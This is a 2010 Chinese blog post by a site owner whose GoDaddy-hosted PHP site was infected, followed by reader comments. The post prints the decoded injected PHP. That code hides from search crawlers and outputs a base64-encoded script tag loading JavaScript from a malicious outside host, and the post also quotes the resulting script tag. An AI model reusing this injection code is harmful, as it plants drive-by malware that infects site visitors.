godaddy空间大面积被挂马
下午觉得有点奇怪,我在ubuntu里怎么也出现查杀病毒的信息,看到下面这个图片,我还以为真的是我的电脑有问题(因为同时开着xp虚拟机),后面出现要下载的,想想不对,就看了一下那个网址,
因为我只是打开了firefox上次打开的网页,而且都是我自己的网站,所以还是不太相信,就刷新了一下自己的网站,发现竟然被挂马了,,
一网友的截图
我原以为是phpwind代码的问题,到里面看了一下,发现里面的模板并没有问题,又到首页把index.php换了一下,发现还是没有用,可能是感染了好几个文件
后面想着可能是godaddy空间的问题,到idcspy的godaddy版块一看,发现N多的朋友在说这件事,
真是郁闷啊,
他们是在php的头部加入了一个加密的php代码,解密之后就是这
<?php
if (function_exists(‘ob_start’) && !isset($GLOBALS['mr_no']))
{
$GLOBALS['mr_no'] = 1;
if (!function_exists(‘mrobh’))
{
if (!function_exists(‘gml’))
{
function gml()
{
if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr
($_SERVER["HTTP_USER_AGENT"], "yahoo")))
{
return base64_decode(
"PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbmRlc2lnbnN0dWRpb2luZm8uY29tL2xzLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if (!function_exists(‘gzdecode’))
{
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
{
$R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr
($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
$RBE4C4D037E939226F65812885A53DAD9 = 10;
$RA3D52E52A48936CDE0F5356BB08652F2 = 0;
if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4)
{
$R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack(‘v’, substr($R5A9CF
//……..
?>
这个代码会自动在php网页的底部输出一个js
<script src="http://holasionweb.com/oo.php"></script>
双重加密
现在只好把网站根目录的php 文件全部删除,上传一个不可写的说明,
不知道godaddy什么时候会搞好,
godaddy的回信是说:
大概意思就是说他们不确定这恶意代码是在他们服务器上,他们认为是我们自己的程序安全,他们无法帮我们清楚
我杯具啊,这情况怎么搞?又不是只有我自己,你们再写信去吧,我不知道怎么办了你们再帮忙翻译下,可能我翻译会有出错
http://bbs.idcspy.com/thread-95785-1-1.html
不是空间的问题,那么godaddy空间自己的配置文件gdform.php也被感染要怎么说???
难道这个代码可以自己传播??
而且也不可能所有的用户都把自己的ftp用户名密码丢了吧,,
这个时候,并不是说他们补偿或是什么的,你没有找到这个源病毒,再删除也没有意义啊,
看来国内外的空间商都是一个了样,只是有一些表面上做得好看点而以,,
By 被挂了, 2010年05月12日 @ 8:01 上午
我的也被挂了,不知道怎么处理这个事情
By admin, 2010年05月12日 @ 10:44 上午
怎么处理?这的确是比较麻烦的事,我专门写一个吧,
请大家不要点他被挂了的网址
By qianlingbc, 2010年05月19日 @ 10:01 上午
求清楚木马的方法,目前网上说的方法我都试了,没用···请博主传授一二,邮箱联系qltjd#163.com,谢谢了!
By 紫砂壶, 2010年07月16日 @ 7:31 下午
不会吧,正想搞一个godaddy的空间呢
By doffs, 2010年07月17日 @ 7:47 上午
现在不要买这个了,
By hosting dominios, 2011年09月29日 @ 10:33 下午
Terrific site, where did you come up with the information in this blog? Im glad I found it though, ill be checking back soon to see what other articles you have.